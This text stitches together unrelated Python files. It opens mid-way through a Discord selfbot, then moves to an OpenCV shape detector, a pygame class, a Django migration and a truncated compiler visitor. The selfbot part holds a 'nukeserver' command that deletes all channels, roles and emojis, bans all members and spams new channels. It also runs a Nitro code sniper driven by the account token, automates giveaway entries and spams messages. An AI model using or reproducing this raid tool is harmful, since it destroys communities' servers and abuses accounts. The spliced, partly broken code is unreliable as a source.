تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") await ctx.send("تاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكوتاكو بيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يمبيل تاكو بيل يم يم تاكو أنا أحب سندويشات التاكو يم يم يم تاكو يومتاكو بيل تاكو بيل يم يم تاكو أنا أحب التاكو يم يم يم تاكو يوم") except Exception as error: errorprint("Exception ' {0} ', UNKNOWN ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: This error is unknown, please contact host \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def nukeserver(ctx): await ctx.message.delete() commandprint("Command 'nukeserver' has been used by " + bot.user.name) try: for channel in list(ctx.guild.channels): try: await channel.delete() except: warningprint("Could not complete 'channel.delete'") for user in list(ctx.guild.members): try: await user.ban() except: warningprint("Could not complete 'user.ban'") for role in list(ctx.guild.roles): try: await role.delete() except: warningprint("Could not complete 'role.delete'") for emoji in list(ctx.guild.emojis): try: await emoji.delete() except: warningprint("Could not complete 'emoji.delete'") try: await ctx.guild.edit() except: warningprint("Could not complete 'guild.edit'") for _i in range(10): await ctx.guild.create_text_channel(name="lol bye") await ctx.guild.create_voice_channel(name="lol bye") await ctx.guild.create_category(name="lol bye") except Exception as error: errorprint("Exception ' {0} ', expected error message sent to users chat".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: You do not have permissions. \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def kiss(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'kiss' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "kiss @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get("https://nekos.life/api/v2/img/kiss") res = r.json() em = discord.Embed(description=user.mention, colour=color) em.set_footer(text=footer) em.set_image(url=res['url']) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def cuddle(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'cuddle' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "cuddle @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get("https://nekos.life/api/v2/img/cuddle") res = r.json() em = discord.Embed(description=user.mention, colour=color) em.set_footer(text=footer) em.set_image(url=res['url']) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def pat(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'pat' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "pat @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get("https://nekos.life/api/v2/img/pat") res = r.json() em = discord.Embed(description=user.mention, colour=color) em.set_footer(text=footer) em.set_image(url=res['url']) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def tickle(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'tickle' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "tickle @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get("https://nekos.life/api/v2/img/tickle") res = r.json() em = discord.Embed(description=user.mention, colour=color) em.set_footer(text=footer) em.set_image(url=res['url']) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def slap(ctx, user: discord.User=None): await ctx.message.delete() commandprint("Command 'slap' has been used by " + bot.user.name) if user is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "slap @Flairings", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: r = requests.get("https://nekos.life/api/v2/img/slap") res = r.json() em = discord.Embed(description=user.mention, colour=color) em.set_footer(text=footer) em.set_image(url=res['url']) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def img(ctx, text: str): await ctx.message.delete() if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "img help", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: commandprint("Command 'img' has been used by " + bot.user.name + " with a message of " + text) possible = [ 'feet', 'yuri', 'trap', 'futanari', 'hololewd', 'lewdkemo', 'solog', 'feetg', 'cum', 'erokemo', 'les', 'wallpaper', 'lewdk', 'ngif', 'tickle', 'lewd', 'feed', 'gecg', 'eroyuri', 'eron', 'cum_jpg', 'bj', 'nsfw_neko_gif', 'solo', 'kemonomimi', 'nsfw_avatar', 'gasm', 'poke', 'anal', 'slap', 'hentai', 'avatar', 'erofeet', 'holo', 'keta', 'blowjob', 'pussy', 'tits', 'holoero', 'lizard', 'pussy_jpg', 'pwankg', 'classic', 'kuni', 'waifu', 'pat', '8ball', 'kiss', 'femdom', 'neko', 'spank', 'cuddle', 'erok', 'fox_girl', 'boobs', 'random_hentai_gif', 'smallboobs', 'hug', 'ero', 'smug', 'goose', 'baka', 'woof' ] if text == "help": em = discord.Embed(title='List of images', color=color) em.description = "{}".format(possible) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) r = requests.get("https://nekos.life/api/v2/img/" + text) res = r.json() em = discord.Embed() em.set_footer(text=footer) em.set_image(url=res['url']) await ctx.send(embed=em, delete_after=deletetimer) except KeyError: commandprint("KeyError has been triggerd.") @bot.command(pass_context=True) async def info(ctx): await ctx.message.delete() commandprint("Command 'info' has been used by " + bot.user.name) try: currenttime = time.time() difference = int(round(currenttime - start_time)) text = str(datetime.timedelta(seconds=difference)) embed=discord.Embed(title=f"**BOT INFORMATION**", description="", color=color, delete_after=deletetimer) embed.add_field(name="**VERSION**", value=version, inline=False) embed.add_field(name="**UPTIME**", value=text, inline=False) embed.add_field(name="**PING**", value=f"{round(ctx.bot.latency * 1000)}ms", inline=False) embed.add_field(name="**PREFIX**", value=prefix, inline=False) embed.add_field(name="**COMMANDS**", value="" + str(amountofcommands), inline=False) embed.add_field(name="**CONFIG**", value=f"{config_name}", inline=False) if nitrosniper == "true": embed.add_field(name="**NITRO SNIPER**", value="Enabled", inline=False) else: embed.add_field(name="**NITRO SNIPER**", value="Disabled", inline=False) if giveawaysniper == "true": embed.add_field(name="**GIVEAWAY SNIPER**", value="Enabled", inline=False) else: embed.add_field(name="**GIVEAWAY SNIPER**", value="Disabled", inline=False) embed.set_footer(icon_url=bot.user.avatar_url, text="Logged in as: " + bot.user.name) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', user not found?".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) download_attachments = "true" with open('data/blacklisted words/badwords.txt') as bad_words_list: bad_words_list = bad_words_list.read().split() @bot.event async def on_message(message): # download attachments if download_attachments == "true": guild = message.guild if not guild: if message.author.id != bot.user.id: if message.attachments: await message.attachments[0].save(f'data/attachments/{message.attachments[0].id}-{message.attachments[0].filename}') eventprint(f'Downloaded {message.attachments[0].filename} from: {message.channel}') # case deletion if message.author.id == bot.user.id: for badword in bad_words_list: if badword in message.content.lower(): detection(bot.user.name + " said a prohibited word '" + badword + "' in '" + message.content + "', deleting in 60 seconds.") await asyncio.sleep(60) await message.delete() detection("Message '" + message.content + "' deleted.") # NITRO SNIPER if nitrosniper == "true": try: code = re.search(r'(discord.gift|discordapp.com/gifts)/\w{16,24}', message.content).group(0) start_time = time.time() def returnData(status, code): if status == 'INVALID CODE' or 'DENIED': perhaps = Fore.RED elif status == 'ALREADY REDEEMED' or 'RATELIMITED' or 'UNKNOWN': perhaps = Fore.YELLOW else: perhaps = Fore.GREEN delay = (time.time() - start_time) sniperprint(Fore.RESET + "[" + perhaps + status + Fore.RESET + "]" + " - " +"[" + Fore.CYAN + code + Fore.RESET + "]" + f" | {message.guild} | {message.author} |" + Fore.RED + " DELAY: " + "%.3fs" % delay) errors = { 1: '{"message": "Unknown Gift Code", "code": 10038}', 2: '{"message": "This gift has been redeemed already.", "code": 50050}', 3: 'You are being rate limited', 4: 'Access denied' } payload = { 'channel_id': None, 'payment_source_id': None } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.306 Chrome/78.0.3904.130 Electron/7.1.11 Safari/537.36', 'Authorization': nitrosniperredeem } session = requests.Session() r = session.post(f'https://discordapp.com/api/v6/entitlements/gift-codes/{code.replace("discord.gift/", "")}/redeem', headers=headers, json=payload) if errors[1] in r.text: returnData('INVALID CODE', code) try: open('data/nitro/nitro-logs.txt', 'a+').write( f'[WARN] Invalid Code {code} | {message.guild} | {message.author}' + '\n') except: open('data/nitro/nitro-logs.txt', 'a+').write( f'[WARN] Invalid Code {code} | {message.guild.id} | {message.author}' + '\n') elif errors[2] in r.text: returnData('ALREADY REDEEMED', code) try: open('data/nitro/nitro-logs.txt', 'a+').write( f'[INFO] Already redeemed Code {code} | {message.guild} | {message.author}' + '\n') except: open('data/nitro/nitro-logs.txt', 'a+').write( f'[INFO] Already redeemed Code {code} | {message.guild.id} | {message.author}' + '\n') elif errors[3] in r.text: returnData('RATELIMITED', code) open('data/nitro/nitro-logs.txt', 'a+').write(f'[WARN] RateLimited' + '\n') elif errors[4] in r.text: returnData('DENIED', code) open('data/nitro/nitro-logs.txt', 'a+').write(f'[WARN] Denied' + '\n') else: returnData('CLAIMED', code) try: open('data/nitro/nitro-logs.txt', 'a+').write( f'[SUCCESS] Claimed Code {code} | {message.guild} | {message.author} | {r.text}' + '\n') except: open('data/nitro/nitro-logs.txt', 'a+').write( f'[SUCCESS] Claimed Code {code} | {message.guild.id} | {message.author} | {r.text}' + '\n') except AttributeError: pass if giveawaysniper == "true": if '**giveaway**' in str(message.content).lower() or ('react with' in str(message.content).lower() and 'giveaway' in str(message.content).lower()): try: await asyncio.sleep(giveawaysniperdelay) await message.add_reaction("🎉") sniperprint("Giveaway entered" + Fore.WHITE + " [" + Fore.YELLOW + message.guild.name + Fore.WHITE + " | " + Fore.YELLOW + message.channel.name + Fore.WHITE + "]" + Fore.RESET) except: sniperprint("Failed to enter Giveaway" + Fore.WHITE + " [" + Fore.YELLOW + message.guild.name + Fore.WHITE + " | " + Fore.YELLOW + message.channel.name + Fore.WHITE + "]" + Fore.RESET) elif '<@' + str(bot.user.id) + '>' in message.content and ('giveaway' in str(message.content).lower() or 'won' in message.content or 'winner' in str( message.content).lower()): try: won = re.search("You won the \*\*(.*)\*\*", message.content).group(1) except: won = "UNKNOWN" sniperprint("Congratulations! You won a Giveaway: " + Fore.LIGHTCYAN_EX + won + Fore.WHITE + " [" + Fore.YELLOW + message.guild.name + Fore.WHITE + " | " + Fore.YELLOW + message.channel.name + Fore.WHITE + "]" + Fore.RESET) await bot.process_commands(message) login()
#basit shape detection # kare ile dikdortgeni ayirt edemez import cv2 as cv img = cv.imread('shapes2.jpg') gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY) __, thresh = cv.threshold(gray, 240, 255, cv.THRESH_BINARY ) contours, __ = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) for contour in contours : approx = cv.approxPolyDP(contour, 0.01 * cv.arcLength(contour, True), True) cv.drawContours(img, [approx], 0, (0, 0, 0), 5) x = approx.ravel()[0] y = approx.ravel()[1] if len(approx) == 3 : cv.putText(img, 'triangle', (x, y-10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2) elif len(approx) == 4 : cv.putText(img, 'rectangle/square', (x, y-10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2) elif len(approx) == 5 : cv.putText(img, 'pentagon', (x, y-10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2) elif len(approx) == 6 : cv.putText(img, 'hexagon', (x, y-10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2) elif len(approx) == 7 : cv.putText(img, 'octav', (x, y-10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2) elif len(approx) == 10 : cv.putText(img, 'star', (x, y-10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2) else : cv.putText(img, 'circle', (x, y-10), cv.FONT_HERSHEY_SIMPLEX, 0.87, (0, 0, 0), 2) cv.resize(img, ((img.shape[0])//3,(img.shape[1]//3))) cv.imshow('shapes', img) cv.waitKey(0) cv.destroyAllWindows()
import pygame from random import randint class Rectangle: def __init__(self, x, y, width, height): self.x = x self.y = y self.width = randint(20,100) self.height = randint(20,100) self.top = y self.bottom = y + self.height self.left = x self.right = x + self.width self.points = [(x, y), (self.right, y), (self.right, self.bottom), (x, self.bottom)] self.dx = randint(-20, 20) self.dy = randint(-20, 20) self.color = (randint(0,255),randint(0,255),randint(0,255)) self.screen_width = width self.screen_height = height def paint(self, surface): pygame.draw.rect(surface, self.color, (self.x, self.y, self.width, self.height) ) def move_logic(self): if self.x + self.width >= self.screen_width: self.dx *= -1 if self.x <= 0: self.dx *= -1 if self.y + self.height >= self.screen_height: self.dy *= -1 if self.y <= 0: self.dy *= -1 self.x += self. dx self.y += self. dy self.top = self.y self.bottom = self.y + self.height self.left = self.x self.right = self.x + self.width self.points = [(self.x, self.y), (self.right, self.y), (self.right, self.bottom), (self.x, self.bottom)] def collision_logic_c(self, shape): self_x1, self_y1 = self.points[len(self.points)-1] for self_x2, self_y2 in self.points: if self_x1 - self_x2 == 0: if (shape.x - self_x1)**2 <= shape.radius**2: temp_points = {} temp_y1 = shape.y - math.sqrt(shape.radius**2 - (shape.x - self_x1)**2) temp_y2 = shape.y + math.sqrt(shape.radius**2 - (shape.x - self_x1)**2) if temp_y1 < max(self_y1, self_y2) and temp_y1 > min(self_y1, self_y2): temp_points["y1"] = temp_y1 if temp_y2 < max(self_y1, self_y2) and temp_y2 > min(self_y1, self_y2): temp_points["y2"] = temp_y2 if len(temp_points) > 0: return True elif self_y1 - self_y2 == 0: if (shape.y - self_y1)**2 <= shape.radius**2: temp_points = {} temp_x1 = shape.y - math.sqrt(shape.radius**2 - (shape.y - self_y1)**2) temp_x2 = shape.y + math.sqrt(shape.radius**2 - (shape.y - self_y1)**2) if temp_x1 < max(self_x1, self_x2) and temp_x1 > min(self_x1, self_x2): temp_points["x1"] = temp_x1 if temp_x2 < max(self_x1, self_x2) and temp_x2 > min(self_x1, self_x2): temp_points["x2"] = temp_x2 if len(temp_points) > 0: return True else: px = self_x2-self_x1 py = self_y2-self_y1 temp = px*px + py*py u = ((shape.x - self_x1) * px + (shape.y - self_y1) * py) / float(temp) if u > 1: u = 1 elif u < 0: u = 0 x = self_x1 + u * px y = self_y1 + u * py dx = x - shape.x dy = y - shape.y dist = math.sqrt(dx*dx + dy*dy) if dist <= shape.radius: return True self_x1, self_y1 = self_x2, self_y2 return False
# Generated by Django 3.1.2 on 2021-03-26 18:53 from django.db import migrations, models import lfs.core.fields.thumbs class Migration(migrations.Migration): dependencies = [ ('manufacturer', '0002_auto_20150428_2039'), ] operations = [ migrations.AlterField( model_name='manufacturer', name='image', field=lfs.core.fields.thumbs.ImageWithThumbsField(blank=True, null=True, sizes=((60, 60), (100, 100), (200, 200), (400, 400)), upload_to='images', verbose_name='Image'), ), migrations.AlterField( model_name='manufacturer', name='meta_title', field=models.CharField(default='<name>', max_length=100, verbose_name='Meta title'), ), ]
import ast from typing import Dict, Tuple from boa3.compiler.codegenerator import CodeGenerator from boa3.model.method import Method from boa3.model.operation.binary.binaryoperation import BinaryOperation from boa3.model.operation.binaryop import BinaryOp from boa3.model.operation.unary.unaryoperation import UnaryOperation from boa3.model.symbol import ISymbol from boa3.model.type.itype import IType from boa3.model.type.type import Type from boa3.model.variable import Variable class VisitorCodeGenerator(ast.NodeVisitor): """ This class is responsible for walk through the ast. The methods with the name starting with 'visit_' are implementations of methods from the :class:`NodeVisitor` class. These methods are used to walk through the Python abstract syntax tree. :ivar generator: """ def __init__(self, generator: CodeGenerator): self.generator = generator @property def symbols(self) -> Dict[str, ISymbol]: return self.generator.symbol_table def visit_to_generate(self, node: ast.AST): """ Visitor to generate the nodes that the primary visitor is used to retrieve value :param node: an ast node """ result = self.visit(node) # the default return of the name visitor is the name string if isinstance(node, ast.Name): # TODO: validate function calls self.generator.convert_load_symbol(result) def visit_FunctionDef(self, function: ast.FunctionDef): """ Visitor of the function definition node Generates the Neo VM code for the function :param function: the python ast function definition node """ method = self.symbols[function.name] if function.returns is not None: fun_rtype_id: str = self.visit(function.returns) else: fun_rtype_id: str = Type.none.identifier symbol: ISymbol = self.generator.get_symbol(fun_rtype_id) if isinstance(method, Method) and isinstance(symbol, IType): fun_return: IType = symbol method.return_type = fun_return self.generator.convert_begin_method(method) for stmt in function.body: self.visit(stmt) self.generator.convert_end_method() def visit_arguments(self, arguments: ast.arguments) -> Dict[str, Variable]: """ Visitor of the function arguments node :param arguments: the python ast function arguments node :return: a dictionary that maps each argument to its identifier """ args: Dict[str, Variable] = {} for arg in arguments.args: var_id, var = self.visit_arg(arg) # Tuple[str, Variable] args[var_id] = var return args def visit_arg(self, arg: ast.arg) -> Tuple[str, Variable]: """ Visitor of a function argument node :param arg: the python ast arg node :return: a tuple with the identifier and the argument """ var_id = arg.arg var_type = self.visit(arg.annotation) return var_id, Variable(var_type) def visit_Return(self, ret: ast.Return): """ Visitor of a function return node :param ret: the python ast 